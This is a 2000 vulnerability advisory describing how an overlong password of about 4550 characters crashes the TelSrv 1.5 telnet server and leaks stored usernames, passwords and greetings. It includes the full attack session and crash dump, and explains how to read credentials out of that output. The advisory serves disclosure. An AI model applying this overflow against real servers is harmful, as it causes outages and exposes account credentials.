TelSrv Reveals Usernames & Passwords After DoS Attack

2000-07-28T00:00:00
ID SECURITYVULNS:DOC:492
Type securityvulns
Reporter Securityvulns
Modified 2000-07-28T00:00:00

Description


Details

Application: GAMSoft's TelSrv 1.5 (could be more... I don't have time to check, nor do I have the other programs) Problem Type: Denial of Service Attack - Reveals User Names & Passwords Author: Patrick Webster (mailto:webster@pis.com.au) Platform: Win95 (could be more again... unable to test) Risk Factor: High Credibility: Patrick Webster (mailto:webster@pis.com.au) Vendor Status: Contacted, but no reply. Vendor Website: http://www.gamsoft.com Discovered: 20th July, 2000 (Australian) Reported: 28th July, 2000 (Australian)


Introduction

*Note: This is my first report, so forgive me if I make any mistakes / errors etc...

I first discovered this problem when trying to perform the Denial of Service attack on TelSrv 1.5 which was reported not long ago. I had downloaded TelSrv on 28 August 1999, and after playing around with it, decided I didn't need it, thus uninstalling it and forgetting about it. When I received the DoS report, I remembered I still had the installation, and decided to give it a go. What was odd, was that when I did it, TelSrv didn't crash, it was working fine, prompting me for the password. I decided to try sending the 4550 characters as the password, and when I did, TelSrv crashed, sending back a bunch of unimportant characters. At first I thought these characters were worthless, until I noticed the message "Welcome Admin!" which was the message to be displayed upon login by user 'admin'. I then figured that if it displays the admin login message, it may very well display other hidden details. I setup another account to test for this - Username: 22222, Password: 11111. I did the crash again, and to my surprise, there, in the bunch of junk characters, was the numbers 22222 & 11111! I tried this again, using different names, such as a1b2c3 and when I tried the crash again, it displayed what looked like encrypted characters (eg. ?1u2д3, not accurate though). With this in mind, I decided that I would find the encrypted values of each character, by creating account names such as ABCabc123!@# an so on, and writing a program to decrypt this.

I created a text file, which was to contain the encrypted version of the character and a decrypted version, and while I was using 'cut & paste' to transfer the encrypted character to the text file, I noticed that the character had now changed to its real form. The character had changed due to the difference in DOS characters to Windows characters (??bit - 32bit?), the DOS characters being shown in telnet & Notepad, whereas the Windows symbols being shown in Wordpad. This explains why the numbers were the same compared to the letters which were different. So basically, all you have to do is use the DoS attack, using 4550 characters (maybe less?) and copy the data which is forced back, viewing it with Wordpad or the like, and simply looking through the data for any recognisable words etc. One username always seems to be displayed after the files path, so that is a start.


Exploit

The problem is bad bounds checking, so that when you connect to the TelSrv Telnet Server and use 4550 characters as a password, the telnet service crashes, responding to the client with data containing TelSrv usernames, passwords & custom login messages. This data can then be used to login to TelSrv. The only problem is that it crashes the server upon execution.

Start Example:

*Note: For this example, I have created only one account, details are as follows...

Username: 11111username11111 Password: 22222password22222 Custom Message: This is the custom greeting message!

If you look towards the end of the following code, you will see that '11111username11111, 22222password22222 & This is the custom greeting message!' are displayed. They are displayed normally because of the formatting of this document.

Please Wait...Connection Accepted (TelSrv 1.5)

This copy of TelSrv is not registered. Registration will remove this message and the 5 second delay...

Username : (none, just hit enter)

Password : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA *********AdjustTokenPriveleges Failed : %lu AdjustTokenPriveleges Failed : %lu (%s) LookupPrivilegeValue Failed : %lu LookupPrivilegeValue Failed : %lu (%s) SeShutdownPrivilegeOpenProcessToken Failed : %lu OpenProcessToken Failed : %lu (%s)

Requesting shutdown priveleges...

Unknown command

Goodbye! exitError : No priveleges for that operation dosshutdownShutdown failed! If your host system is Windows NT, this process does not have priveleges to shut down the system.

Shutting down... reboothelpPassword :

Error : User database version does not match program version.Note : User database will be converted to new version of TelSrv.Could not save user database.No users are defined. Nobody can log in to the server.S.EXE""%s".DAT.HLPGAMSoftC:\TELSRV.LOG.LOG\LOGIN.WAV\LOGOUT.WAVяяCTel srvDlgWhatWhenWhoTelSrv (0 Connections)TelSrv (%d Connections)Number of connections : %dAre you sure you want to terminate TelSrv?Cant access log file!!Server%-25s%-25s%s %d/%d/%d %d:%02d:%02dLogging in...%d.%d.%d.%dPlease Wait...Logged in as "%s"Login as "%s" failedConnection terminatedFailed to stop the server.Warning! There are active connection(s). If you stop the server now, these connections will be terminated.

Are you sure you want to stop the server?Failed to start the server. This can be caused by several problems :

TCP/IP is not installed on this system. The port number is invalid. The port number is already in use by another application.Server ConfigurationDеI_xC§/Уќк¶ТЂkZЁ§Ш ¦@Lа@J_?µ@xCXчeюяѕДs)А75@Pxѕщ @н)eЃ° xШ S xЂ xр SC:\PROGRAM FILES\TELSRV\TELSRV.DAT"C:\PROGRAM FILES\TELSRV\TELSRVS.EXE"11111username11111)kЦл,©!»п__LьмѕФнQEM™%ЋQeS\3м?T§" НLж9!s‹РЎZPc'2ШцЁйщЂr@ЌnyмЎ+r6'g¶v5кЭу1N рП 522222password22222Й°№К-ЫьАмЄ ГОCA‚o1Дsьeќuќ/Х·›пODыд/УЭ]b‡О"}FпT‰Ђl7Ш }[мВ73?щ!yђ5Ц™ЏЪФћgЁ+Ф~тvOЭAoИЗїgХ h+каЗ>‡UThis is the custom greeting message!!?І9фD5ТЖуґмСЏЦHўІ4-СUM5GґБ$‰T/Ґ·Оa)Ђ"ьЃЌО{z$LYт«a¤ж2Ч]^ ™ЌcТgќ‚ФU:=9ЋMYrЭhVЫI„dwе.M7Т+·J·Цсp"maзЗБхнмЩЧк вО°й‚KЈ"b/#йШІє»в@цMфyґ2Р ‹:‰8њ""Ґ5MЋ‰°;ъ>ИдwхdлйLM'7Њі'МаU8Ъ%X™€пэџСКънНЌU§(ЄЌ‰:? ир¬ьВK5ІЧ¬{t§ъЊфdRУ№µД«$/уdТ†bX_Д/;-vXоНґ0@ иЛa¦›ґууcҐђUвПРНњ ±oa Bљ$&#39;&#37;§ЮQnGЖџжёoD„љЋ&#37;Y&#92;ћ9ј&#39; z™Uј·Ф&#39;€.&#39;жЎ; Ј‡:^РпkЙРзНM]G-…BЬx‰тG&ЮSцІ…n¶DdьЋ>_¤t-Я}Ьu'лdдЅ$Ьr&PYгТДЖ<РЮ„Сaaaaaaaaaaaa aaaaaaaaaaa¦иАQA-NDкчNџьC?ђiеМ|!(ј1j#™-В<зЋxѕЙЊY5!UўOТ{Щщ-W]h~ЙBѕM^oWМ'І м›"тІф±њdъв{uхU*1LО$©бzМи}іgшerbyйв&quot;жОwҐSд-іѕQћ§{]V®5ЎЁcЪС?&#37;f-иєQќ5ґyFќ 8тўъџ№hqCA~&#40;-дЎГ &#40;&#92;ёW:ќ&#37;®!Ќ]ХЌ&#40;ЭФ&#41;б8,Fe€‚‹цI-7O?$:јхўmГh]ЩXЂ#ћ &quot; WAћy§5±9по!Щчв&gt;J-&amp;®Т«Њ·Ы4h6Ц»З М†,]_b¬Хn-utv+ЪCі&amp;тй!O Аdм9&#41;±L&#41;5xPЈ1„ Ф&#40;‡?]VїI&#92;ak·/AЅ/wЪ&lt;6К/е 7·e‚Z§ШцTу ]ІѕЃуЮIy‚W&#41;?ЬЋ ЏУ&amp;ЙЫЊс }Э |ЮэґРЇм УПМ фbх¦…Н&#39;Хк&quot;vѕD№»…$$SЉ8‡¶3№Ћу…}ъШjе БЛу±Ђ·/xЎіјтgаЛ6¬ёLџbМїwйЁЙ1¦cНьj-ЃbЪ-EАгgT УіHJђљ7ы:щЁ'г(шё}cРз"ТKЌ-Q-8ЗҐЎN4џъ/C"кg-ѕd-И{УUб±&ђЭлL[»‚mГУ3НбЕ(

End Example.


Notes

Some odd things I noticed are things such as that TelSrv did NOT crash everytime I performed the operation. I also noticed that it did not always display the full username, password or whatever you're looking for. Sometimes it didn't even respond with any information, just another login prompt. I noticed that when using Windows95's default telnet application, (telnet.exe), that the information containing the usernames etc. did not convert the usernames to their original form, whereas SecureCRT did correctly display the data, which was what I used for this. There are quite possibly many more interesting things people may come across, people may even wish to look into this further, maybe even figure out where the exact location of the different usernames & passwords occur (if there is any formatting in the data) or maybe there is something else valuable in the data (other than revealing the remote path of the server, in this case C:\PROGRAM FILES\TELSRV\).


Credibility

This was discovered by myself (Patrick Webster) around the 20th July 2000 (maybe a day or two earlier), not long after the known DoS attack was released. I acknowledge tha t I am using the method discovered by someone else in a DoS attack, but I am yet to receive a report of the DoS attack (being used on the password prompt) which actually reveals the usernames & passwords of TelSrv, so I believe none else has discovered it yet :)


Greetings

Greets go out to my girlfriend Jo, ZeroX, AkirA, NEO, Blockhead, Lozza, Chatalade and anyone else I missed...

-Pothead


Contact Information

If I really need to be contacted, you can reach me at either... mailto:webster@pis.com.au (preferred) or mailto:dope_squad@hotmail.com

Cheers from Australia :) & sorry for the length of this message.

-Patrick Webster